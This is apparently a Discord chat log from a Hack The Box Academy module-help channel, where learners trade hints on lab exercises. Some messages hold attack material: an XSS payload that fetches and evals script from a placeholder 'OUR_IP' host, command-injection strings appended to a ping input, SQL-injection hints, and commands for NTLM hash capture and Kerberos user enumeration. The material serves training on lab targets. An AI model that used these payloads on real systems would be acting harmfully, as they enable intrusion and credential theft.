If you suspect an issue, reset the lab and get back to that point
Deleting the output bc spoilers
I did serveral times. Is 172.16.8.50 up on your screen?
It was when I did it months ago
Reach out to support
Change vpn regions, sometimes that fixes random errors
ok thanks
Does anyone have the commands necessary to download the Default-creds-cheatsheet from the Password reuse/Default section? Trying to download it to my Parrot OS VM but the commands are for Kali
hey guys, I'm interested in ethical hacking. I would like to work for the government like some of those guys in the shows, like in Scorpion. I'm asking for some guidance as I'm a beginner
Why would it be any different, i just right-click -> copy link -> wget [paste]
Scorpion is heavily glorified. I'll give you props for not saying Mr. Robot though.
Need to speak to a person? Learn how to reach our support via HTB Labs.
I was following the manual installation steps on the github page
On the gh page?
Oh right
I didn't download thar
That*
I just used the website csv and ctrl-f
gh would generally be git clone
Also kali and parrot are both debian
So should be similar/same regardless
Hi
yo can someone help me with one of the modules
its called web proxies
in the skills assessment section i need to send a request to a server using a custom cookie, i get 31 characters of it, then "fuzz" the last character using a wordlist from SecLists called alpha-num.txt, after that encode it using base64 then ASCII-hex then send it to the IP:PORT/admin.php
the problem is IDK if i should send it as a post request or as a Get request , i have tried them both and both ain't working , i am encoding the entire thing reversably after getting the MD5 hash
as the hint told me
its quite hard to explain writing this
i don't have discord on my linux and its kinda annoying to install it
also quick question why is there no voice chats ?
am starting my journey on introduction to information security foundations, module 2 that is Learning Process, last part learning progress, i am not able to answer the last question: What is the difference between the two numbers of the learning progress mentioned above? these are the figures (1.00)^365 = 1.00
(1.01)^365 = 37.7 and the hint is 37.7-1.00, i know one who had done it can relate. kindly i need help on this
The payload option should allow you to add a prefix, which is the 31 characters you decoded
yeah i did
And you can send as a GET or POST
After that you should check the results of each request until you see the flag
Math
i also did thats why i am confused , the response i get is a SET-cookie from the server along with the login screen from the IP:port/admin.php
Then you encode the cookie value and re-encode it in reverse
So step a -> b -> c to decode you do c -> b -> a to encode
i first added the prefix , then added the payload to the payload simplest section (alpha-num-case.text) (which are numbers from 0-9-a-z-A-Z)
then encode as base64 , then encode as ASCII-hex
yeah i did that too
Is that the right reverse order?
I didn't count the characters
i didn't at first then i did because the hint says so
am grateful. am sorted
But when you have it highlighted, you have the entire cookie value portion highlighted when you go to send the payload yeah?
no i added 2 of the things where it doesn't highlight the entire payload (because it's between the two things)
Also this may sound dumb @pearl gulch , but try resetting the target
You only need to encode the cookie=§value§
exactly what i did
cookie : sessionid=§§
exactly like this
either i am high or something is high
Put something random in between
Just to be safe
It might not like it being empty
You won't be able to screenshot anyway
You need to link your account via the directions in #welcome to post images/screenshot
ok ?
btw its me its just my other account
about to try it one moment
nope same thing
Hello,
I'm having trouble with Command Injections > Identifying Filters.
I'm using ZAP proxy to fuzz the POST request with different operators and their url-encoded version. I'm also adding the whoami command at the end to see if the server actually does execute it. My problem is that I never see the output of the command, it's either an error or the simple ping output.
I suspect it's because of how ZAP encodes my payload, so I also tried with curl on the command line and it's the same problem.
I think what could help me is a hint of a curl command that would work, or of how to specify encoding in zaproxy...
ok just to make sure i'm going to send picture to what i am doing
Some characters you might have to encode. Like the new-line character (%0a i believe)
uh what is "account identifier" ?
It's explained in the welcome section, it's on app.hackthebox.com <-
Okay but I tried that, I tried sending POST requests containing :
1.1.1.1\nwhoami
1.1.1.1%0awhoami
And literally:
1.1.1.1
whoami
These returned the execution of the ping 1.1.1.1 command but nothing else.
hi, im in kerberos attacks module doing Unconstrained Delegation - Users and i cant RDP into the box
this is the 3rd time i try
I am able to authenticate with all the linux modules though
Hello all. I'm going through the CPTS path, currently I'm on the last Attacking Enterprise Networks module. Today I finished the Internal Information Gathering section but I have noticed something strange and I can't explain it to myself. I set up dynamic port forwarding using SSH. When I tried to verify if everything is ok by using an nmap scan (using -Pn -sT) against ports of the already compromised host, but with the second IP of the NIC interface, I got that these services are filtered. I looked at the firewall rules to check if there are any rules for the second interface but didn't find anything, checked also if the host is part of AD, but it isn't. After a while I decided to take a look at the walkthrough from the section and noticed that they used the same approach, but on their nmap result the ports are open. Probably they made some changes on the box but didn't update the walkthrough. Anyway, I'm just wondering if anyone can explain to me why I see these services as filtered although they are open and there are no FW rules. Is it related to proxychains, or do I miss something? Sorry for the long explanation. Would appreciate your help!
Maybe update your nmap
Hey, has anyone managed to identify the second vulnerability in the "Intro to Whitebox Pentesting" module? (skill assessment)
||I've successfully read the flag via the /ping endpoint||
Hmm this is a good idea. Didn't come to my mind 😅 I used the Pwnbox provided from HTB, not sure what version is installed there, but will try.
Just checked nmap version is 7.94SVN which is already the newest version
hey guys, why rubeus does not works?
might have been corrupted during transfer
to make sure im using right version, could you suggest me where i can download it?
if you're doing the ad enum and attack module, it should just be the one in C:\tools\ iirc but otherwise that's the version of tools i use
@unreal tartan . this channel
I just want to inform you about my case. I decided to perform the dynamic port forwarding from my kali VM, using the exact same approach, and scanning services now returned open. parrot nmap version is 7.94SVN, kali nmap version is 7.93, proxychains on both machines is 4.16-2. I went back to parrot os and downgraded the nmap version to 7.93 and now proxychains nmap works perfectly, it shows the ports as open. I guess there is some issue with nmap 7.94SVN
Kali on top
I like it more too. But when I don't use my personal PC I use the provided box from HTB. Anyway I'm glad I was able to fix it there as well, almost all day I was pulling my hair 😄
Good Afternoon people. Someone can help me with that?
could anyone help with alert machine? i found the vulnerability and got the admin to press link but something is wrong w my payload idk what tho
HELLO??!!!
hello
Have you tried the techniques from the module? You may need to combine some
Good way to improve on HTB?
Research, skill
mmm i'm noob 😦
Well the module teaches you everything you need to complete it
¯_(ツ)_/¯
Being a noob doesn't excuse you
?
same
i don't know how to put in the flag.txt
you can either type it out or copy and paste
Type shi
hey did you ever figure this out?
anyone knows whats wrong with this ?
idk
yeah same thats why i am asking 😦
Has anyone had an issue with the nmap scripting engine question and getting a no file error for the text file?
Hey friends,
I'm 6 weeks in my cyber journey, and as one should, I'm finding this whole thing fun but challenging.
Is there newbies like me who are looking to work on boxes together, kinda of like a study group?
I feel like bouncing ideas would be a great way to advance through these challenges without the help of writeups
Hopefully this is the right forum for those types of questions.
If interested DM so we can setup a room.
Cheers
Tchou
Hi
it's best to post this in #1225791307256168448
will do! thanks for the speedy response
hello guys i need help on "Footprinting Lab - Hard". what i did so far: i tried to connect to the pop3 service and imap service and i found an ssh certificate but i think it is useless since it is not the private key. i found SNMP open but every time i enumerate it i get "no connection"
Ok
why's that happening
i used braa ||braa backup@10.129.108.34:.*|| still not finding much
Salutations
for the pass the ticket from linux section of password attacks I am logged in as Carlos and I got his crontab and I see a script in his crontab
I run it but it starts to take long to run and there's a results file so
What would you all say,is the HARDEST thing in technology
maybe try something else
And which coding language is it
like what ??
I stop the script as I don't know if it will get the results I'm looking for in the file
something else
I'm trying to get the creds for svc workstations
so will running that script get me that and store it in results file?
idk
i tried to read imap and pop3 through openssl, also enumerate SNMP with braa
this isn't a general chat, this is for discussing HTB Academy modules
I can't talk in general after verifying and everything,I'm not sure how,it made me talk here in module's
Oh wow I can't spell
you must verify your account by using the /identify command with your account identifier from app.hackthebox.com
Ok ill retry,thanks.
i found tom and i think a password
awesome stuff
ok so a while ago I got the flag in the svc_workstations directory but
how do I get into svc_workstations account?
which is the next question because I need to ssh into that
in order to be able to use sudo for privesc
idk
Huzz
on the skills assessment for xss im trying to get a cookie but the webserver keeps throwing GET script.js and doesn't even return the document cookie
Don’t you get the password?
Need to see what it looks Iike
<script>function b(){eval(this.responseText)};a=new XMLHttpRequest();a.addEventListener("load", b);a.open("GET", "//OUR_IP");a.send();</script>
I am having trouble getting the password hash
I am trying to figure out how to get the ticket
the kerberos ticket
for svc_workstations
Kinda confused what I’m looking at
Which one are u sending?
i believe top is script.js, bottom is index.php
the bottom one is my xss payload calc
oh, i misread
Just use src=IP 
Tf you mean src=IP
maybe try a different payload
The examples they used for the module was just <script src=ip></script >
Yeah and try the image payload
and check if you actually put your ip address in script.js
because the cookie you're trying to access is flagged as httponly?
Isn’t it in the temp folder?
can someone give me a hint as to what I need to do to get password in order to ssh in as svc_workstations?
hold on I thought it wasn't let me check again
i don't recall there being any HttpOnly flags set in the Skills Assessment
no
i might be wrong 😉
I remember getting the password for that user
all the other users are listed
So it must be in a keytab or something
idk
aside from you telling me that but also its like I check Carlos's keytab and its not there either
I'm kind of confused
hello guys i need help on "Footprinting Lab - Hard" i have the tom user and password found on ||snmp|| i tried to curl imap ||curl -k 'imaps://10.129.108.34/' --user tom:pass -v|| but i found nothing , any help ?
please
I DID IT
awesome!
guys any help or hint ?
Use openssl s_client to connect to imaps
okay i did but i used ||curl -k 'imaps://10.129.108.34/INBOX?ALL' --user tom:NMds732Js2761 -v|| and found nothing
That’s not what I said
sorry wait i already did that
found ssh key i tried to connect with it but i think it is public key
If you have the private key you can just ssh to root right
Lol
i tried to do chmod 600 to id_rsa file but i think i did something wrong
maybe generating a new keys ?
no
what
If you got the ssh key from imaps, you can ssh with that to root
Make sure it’s properly formatted
okay wait
i got this
─# ssh tom@10.129.108.34 -i id_rsa
Load key "id_rsa": error in libcrypto
tom@10.129.108.34: Permission denied (publickey).
the password is that
?
i found it on SNMP
Yes that’s for tom
That’s how you login to imaps and get the ssh key
Then you ssh as root
Not tom
Yeah it’s where the crontab listed it
Theres another file in the directory
What did you do to fix it
You have to use a different payload
Just do what Session Hijacking taught you and thatll be it
You’re welcome
i finished the entire CBBH path, how should I revise now to ensure I know what im doing
yeah it just kinda hangs for me
how can anyone possibly answer that for you
thats person to person dependent
thats just 'how well did you grasp the material?'
I would go back to where you first landed when you gained access as Carlos. Start enumerating there.
of course its person dependent, isnt everything in life?
yes, some things more so than others
so you agree there are situations where the answer is clearer or more defined
in this case, there'll be no need to be dismissive
I do agree. Im saying this isnt one of them
Nobody can tell them if theyre ready or not
or what they need to still work on
someone might think that is a question worth answering in a concrete step by step fashion
if you think im wrong then answer the question, what should they revise to ensure theyre ready?
i haven’t done the path so i wouldn’t know
lmao
so I say "nobody can answer that for you because nobody but you knows how ready you are" and you disagree but have zero things to actually add
👍
so in your own words readiness is a personal judgement
you can only assess your own knowledge and no external party can judge how prepared you are?
thats what exams are for. the question was how they could ensure they know theyre ready. and the answer is nobody can do that for them. they need to sit down and judge the confidence of their own knowledge
Im not being dismissive, im saying the answer is looking inward
write down what you struggle with and review those concepts
you’re not being dismissive
but you’re definitely falling into the trap of oversimplification
you told me I was
why tf you arguing when you have nothing to contribute to the discussion
you dont like my advice but have none to offer of your own, noted.
it’s not your advice lol
it’s about acknowledging there’s a better approach to revision
to which you didnt offer one
i don’t need to?
i’m saying revision isn’t a one size fits all process
dont care. move along
alright buddy
okay I dont know where to go with this skills assessment, i tried the payloads they gave me but no luck
9/10 times its because you should craft a payload from what you learned, not necessarily one of the examples they gave you
which module
sql injection
kind of hard to construct a payload when all it says is invalid credentials
ah that part, youre overthinking things. just be more thorough
not enough variations
i dont know what to do lmao
unfortunately youre close enough that there really isnt any advice that isnt just telling the answer
youre on the correct track
You fell right into the troll😭
its my specialty lul
i refuse to look up the answer
like I said you were already on the right track. just need more variations
where should I look for more variations
your brain. think em up
Hey guys, quick question about burp: i need to set my proxy when i launch an auxiliary from msf (to check for the robots.txt file), and look in burp at the request it makes, and i need to give the last line of the request. they say "it starts with "msf"" but in my request i don't have that. any idea? module web proxies
there's a tool for this
im not using sqlmap
sqlmap doesnt work for that part anyways
trying to do this manually?
Yes!
as they should
hell yeah
maybe its a different dbms
there's a wordlist for this
The login page part?
yes
Think super super simple
ive tried or 1=1 it doesnt work
exact syntax is important
no shit
its a reminder, go away troll
Did u comment out the rest?
my bad i used the wrong auxiliary -_-
OHHHHH
jeez thanks for being helpful at least fox tried
not contributing anything but complaining about others is their specialty
I have the exact payload in my notes lol the goal is to get vader to realize their own mistakes and discover the solution themselves
awesome
I got it
congrats
Hashtag is a hell of a drug
didnt use one in my payload but more than one way to skin a cat
In section "LLMNR/NBT-NS for windows" in Active directory Enumeration and Attack module
No matter how long I wait, any NTLM hash doesn't appear on the console.
has anyone resolved it??
how do you set up responder?
I used inveigh in the same way the section material says,
Import-Module C:\Tools\Inveigh.ps1
Invoke-Inveigh Y -NBNS Y -ConsoleOutput Y -FileOutput Y
It captures LLMNR, NBNS, DNS messages well but not NTML hash
Are you running as admin?
iirc hashes are only sent when victim tries to authenticate with smb
how long did you wait too? its been awhile but I vaguely recall one of those modules having awhile before the hash showed up
Thank you very much. I didn't run powershell as admin.
Right after trying it, I got a NTML Hash captured
NTLM; the order matters
If anyone has been here, I am stuck. Just a nudge on question 3 might be enough to get me to question 4 and so on... if you are out there, please help.
Information Gathering - Web Edition | Final Assesment
keep trying to find different subdomains.
those hosts have to be wrong
.htb is a fake tld, you're pointing it to a real IP
could be totally wrong as i didn't do that update module but i've never seen a htb module setup like that
It's a subnet used for challenge / docker spawns, so could be legit
it is
but I don't know for sure either, sorry
alright fair enough don't listen to me
Nah you're good
It's cool, I don't know shit either.
As for a wordlist of choice, if it's from a module, I'd imagine they would hint at a wordlist to use in there - you shouldn't have to use a top 1 million list at the least
I use gobuster vhost with -t 200 at the end and it flies pretty quick
I think I am onto something.. no worries. https://academy.hackthebox.com/module/144/section/1311 if I am wrong I'll be back.
Nice one 🙂
Thanks very much
Were you able to figure this one out? I'm getting a connection but no DC01 ticket.
he was using the wrong credentials i believe
I thought you were given one vhost, a target IP, and port?
I'm stuck like chuck on this one. How did you extract the TGS ticket of DC01$?
I'm getting a connection, but no TGS ticket.
Were you able to figure this one out? I'm stuck in the same spot you were in. Any help?
just waited 10 minutes for DNS to recache
Hi, who can give me a hint in Advanced SQL Injection Skill assessment (RCE)? It seems that CREATE function doesnt work. I read the hints from the history, tried to exploit using sessions from the different users, but the create function seems not work at all
Question 4 and 5 are now solved using ReconSpider and adding www.inlanefreight.htb to the hosts file, now I just need to figure out question 3 and I can be done. At least I made progress tonight.
To answer that you have everything you need. It's just a matter of thinking very simple and the hint is in the first paragraph of the scenario.
hello, i stuck on mitm for access to private api, someone know how to acces?
Hello partners, any alternative tools to kirbi2john.py?
kirbi2hashcat?
Thank you I think I did the same Kirbi2John.py function
Is there a section in the module where we can practice PetitPotam or we have to find a machine/lab it ?
I don't recall, but from the modules I think we could only practice nopac
nah
Keep it simple, pillage what you can and use that
also, tools that can generate payloads can come handy
Don't look for CVE's just yet
whats EoP
Elevation of Privilege
oh
Do you have the necessary privileges for them to work?
Not sure, I'm confused as you mentioned the final assessment of the module and later on it turns out to be the first skills assessment
AD enum and attacks -> bleeding edge vulnerabilities
I need help with the skill assessment for Parameter Logic Bugs. I have a hard time finding || A function which I can use to get free subscriptions||
Yeah, but I dont think it has ADCS configured which is required
Hey there, having trouble during the web proxies module:
I'm currently doing the web proxy module from the academy,
typing this in the command prompt
nmap --proxies http://127.0.0.1:8080 SERVER_IP -p55379 -Pn -sC
It gives me the result of the scan but nothing can be found on the burp's history
If anyone know why, I'll be glad to read you ^^
I tried with proxychains command and it outputs me the same
dm the command
I was able to find my metasploit activity in the history btw so this is really weird to me
In module "Password Spraying - Making a Target User List", i should enumerate user list in domain with kerbrute tool to solve the problem
for example,
"kerbrute userenum -d inlanefreight.local --dc 172.16.5.5 /opt/jsmith.txt "
in this problem, how can i know the domain controller's IP??
has anyone solved it?
By scanning the network
Thank you i found the domain controller with responder and nmap scanning
I'm able to register one of the ordinary subscriptions and unlock most of the content but still experience problems when getting the right subscription
Hello, I'm doing Command Injections > Identifying Filters
The web server runs a ping command and I'm supposed to inject it by fuzzing different operators and their url-encoded version:
1.1.1.1;whoami
1.1.1.1&&whoami
My problem is that none of the commands work. I'm using ZAP and I either get a response saying "Invalid input" or I just get the result from the PING command and never the result from the whoami command.
Can anybody explain what I'm doing wrong?
in windows attack and defence, the vm does not have the 'passwords.txt' dictionary file and I cant seem to find any reference to it. Any help? Am i missing something?
Hi,
Path: Penetration testing (JOB ROLE)
Module: Information gathering
Section: DNS Zone Transfers
I'm stuck at following question.
Q.After performing a zone transfer for the domain inlanefreight.htb on the target system, how many DNS records are retrieved from the target system's name server? Provide your answer as an integer, e.g, 123.
For the zone transfer I need the NS record of the DNS server but it is not retrieving any NS record. I tried adding the IP to the hosts file, tried using random NS servers like ns1, ns2, but failed.
No, you do not need an NS record. You need a nameserver. The target IP is the nameserver
Hi guys
Please answer a question for me. I'm finishing some machines, but I'm not earning any points. Does anyone know why?
hi, I can't run any OS commands using PowerUpSQL: PS C:\Tools> Invoke-SQLOSCmd -Verbose -Instance "172.16.5.150,1433" -username "inlanefreight\damundsen" -password "SQL1234!" -Command "whoami" VERBOSE: Creating runspace pool and session states VERBOSE: Closing the runspace pool
I can't run it from Linux, only from the PowerShell host
I'm doing this section from the AD module
basically they misconfigured the ssh, so you can't ssh to the linux attack host they mentioned
my only option is from Windows with PowerUpSQL, but the command in the SS does not return anything.
i confirmed the sql server is running
Anyone ran into these issues when trying to get ODAT working?
asyncore is deprecated and you can't pip install it anymore
Module is Oracle TNS section of footprinting
Ok this solves it https://github.com/simonrob/pyasyncore
pip install pyasyncore
hashcat -m 11600 -b
hashcat (v6.2.6) starting in benchmark mode
Benchmark relevant options:
- --optimized-kernel-enable
- Hash-Mode 11600 (7-Zip) [Iterations: 16384]
Speed.#1.........: 299 H/s (51.06ms) @ Accel:64 Loops:4096 Thr:1 Vec:8
I might need some help from a GPU-equipped fella :°D => ref: Extract the hash from the attached 7-Zip file, crack the hash, and submit the value of the flag.txt file contained inside the archive.
Guys I have a question about subdomain enumeration.
I add the IP and domain name to my /etc/hosts file and then use ffuf to enumerate subdomains. But it does not find anything. Only when I add the subdomain to the /etc/hosts file (because I know it is there) is ffuf able to find it (but then of course I already know it exists).
Could someone explain to me what I am doing wrong?
Info Gathering Web Edition? go to /etc/hosts/ add inlanefreight.htb + IP then go back to the terminal and try ffuf again with inlanefreight.htb:PORT# as you discover new sub-domains, add those to /etc/hosts/ too and repeat the ffuf or try gobuster vhost
Well, it's just in general with subdomain enum. I add domain.htb to my hosts file and use ffuf against FFUF.domain.htb and it does not find anything.
But when I add something like dev.domain.htb and use FFUF.domain.htb it then finds the dev subdomain, but then I already know it exists, right? My question is why it won't come up when I only have domain.htb in my hosts file
look up the difference between subdomain and vhost enumeration
Add the domain.htb && IP to the /etc/hosts/ file then try: gobuster vhost -u http://<ip>:<port> -w <wordlist> --append-domain -t 200 if anything shows up add that to /etc/hosts/ and repeat, that's my best advice
Ahhh that's right! I forgot the --append-domain. Now it works for me hahahah. Thanks man!
Well apparently ODAT is still borked
Any one will to help sqlmap skills assessment
you can dm me
💀🤣
Did you happen to get Question 3 yet? That's the one I am stuck on in the Final Assessment, I need some help finding the API in the hidden admin folder.
Im not sure anymore but I believe I used ReconSpider
is ODAT not installed on pwnbox?
Is pwnbox internet slow or something I tried installing odat using the script provided in the foot printing module and it wouldn't connect to the parrot repo to download stuff or clone the GitHub repo
And can't wget the required oracle package either
is there a possibility to reset the progress on a job role path? I wanted to go through it again.
No. But you can do the modules again one by one
You tell me
apparently they're both vulnerable
I managed to login successfully as admin but not tom
weird
I am on the skills assessment for Pivoting, Tunneling, and Port Forwarding. I am not stuck, just wondering why this isn't working properly, and I've already done everything ChatGPT has recommended. I did a for-loop ping sweep and found two hosts up on the internal network. I am trying to run nmap through proxychains to scan the individual IPs I found, but nmap is only showing the ports as open when I scan them individually. For example, proxychains nmap -v -sT -Pn -p 1-4000 -T4 172.16.5.0 returns that no ports are up, but proxychains nmap -sT -Pn -p 3389 172.16.5.0 shows that RDP is running. Any idea why this is or a fix?
check DM
I'd put the SQL payload in username then a random password, try that
then put random username and sql payload in password
thanks for reply
hi guys
I'm new here
can i have some advice
if any one minds
guys how many cubes u have in (hack the box)
I cannot get to robots.txt for the life of me. It's the last question and then I am done with the Information Gathering - Web Edition final assessment. If I try things like dig inlanefreight.htb:port TXT I get nada, so I try that and all the other domains like the aws one and nada. I can't figure out where it is hiding. + 1 Question 3 "What is the API key in the hidden admin directory that you have discovered on the target system?" So it must be inlanefreight.htb right? I mean I am a brain cancer survivor and this stuff kicks my butt as bad as some other peeps here. It's gotta be simple like you said, so where am I going wrong? whois isn't an option, dnsenum fails with NS record query failed: NXDOMAIN, wget gives me junk headers, not all of that is relevant, I just think I am missing something, do you have any extra advice?
is there an IA pentesting tool or a module on it
Yeah shoot me a DM
what is the best worth module for 500 cubes?
depends on your goals
Ok thanks, I managed to find a solution
?
@jolly yacht I'm tackling task 1. It's tough! Have u made any progress?
yeah, completed
tip: you don't need to print it
try other ways to retrieve the decoded value, which is obvious
intercept with burp -> intruder
intruder -> cluster bomb and set payloads on each parameter
Is OSCP still helpful in getting jobs?
#careers-and-certs might be a better place to ask
Sorry, I thought that this was general chat
why do i have no access to that channel?
Because you didn’t read and follow instructions in #welcome
Follow them and you’re in 😄
ahh. lol
You got this 💪
🎉
Need help on Active directory enum and attack, Skills assessment 2, The question where i have to get admin on MS01,
Enumeration of the environment is key!
I did do enumeration, and I feel like I'm just missing something with the information I have, is it okay if I DM you and tell you where I'm at?
You can DM I have a few minutes to burn.
have you tried powerview?
Hi, can I get a nudge on Kerberos Attacks - Skills Assessment? I have identified the machine that has unconstrained delegation, but I'm stuck on what to do next from here
I need to find a username, but I've tried everything in the module so far. But maybe I'm missing something
I don't have access to PowerShell yet
Guys, please can someone help me? In the Password Attacks module I have one question left. How many users did you collect? How do I have to submit the answer? Write every user by name? A number? Or WHAT?
Andy, I also have an issue understanding this question. How do you have to submit the answer, as a number? Making a list of users separated by commas, colons etc.? Or what?
I am having the same problem. I can't understand what they want from me. How to submit the answer? In letters, in numbers? Or how?
I would try a number, i.e., 1 or 2, etc. Make sense?
tried, no sense. Numbers, letters, practically everything, and feeling out of ideas )))
You can DM what you have tried.
Hey guys, I have a question. I have a blog where I write about different projects I do in cybersecurity and I was wondering if I could create a pentest report for the AD Enumeration & Attacks - Skills Assessment parts. Is this allowed or will HTB try to sue me?
Security Monitoring & SIEM Fundamentals - SIEM Visualization Example 4
Navigate to http://[Target IP]:5601, click on the side navigation toggle, and click on "Dashboard". Extend the visualization we created or the "User added or removed from a local group" visualization, if it is available, and enter the common date on which all returned events took place as your answer. Answer format: 20XX-0X-0X
Hello and what’s wrong with this question? No date that I get from it is correct, is there a different code for returned events than 4732,4733?
I figured out the answer, I didn't need to use PowerView. I just used evil-winrm and crackmapexec, and Metasploit.
anyone!!!
me staring at the penetration tester path cost knowing my dreams are over: 
are you a student? you can get access to the path for just $8/mo if you are
oh i can?
I only found the purchase cubes option which only had 2 subscriptions, had no idea
Step by step guide on how to access the Student Plan.
where did u see the paths at? the website?
sadly my academic institution doesn't give us emails 
you must have one
yh, i noticed
scroll down to the Students with No Academic Email section
well thankfully I still have access to the other paths
oh
oh well thats good, i can definitely provide the needed information, thanks!!!
oh wow, this is an actual company. I thought someone just made this server for the jokes
yep, this server is run by HTB themselves
question
there's a lot of courses. I don't know which to pick. Which one do u recommend if I wanted to do ethical hacking
you can choose either the penetration tester path or the bug bounty hunter path
word. thank u. $490 for each course?
$490 is for the Silver Annual sub
that sub gives you access to both of those paths + an exam voucher
an exam voucher gives you two (2) exam attempts
word. thanks!
but in order for you to have a second attempt if you fail, you have to submit a report for your first attempt
ahh I get it. Then if I fail both times = more money
yea. you'll have to pay for another exam voucher
which would be another $490? or those sold separately
Sold separately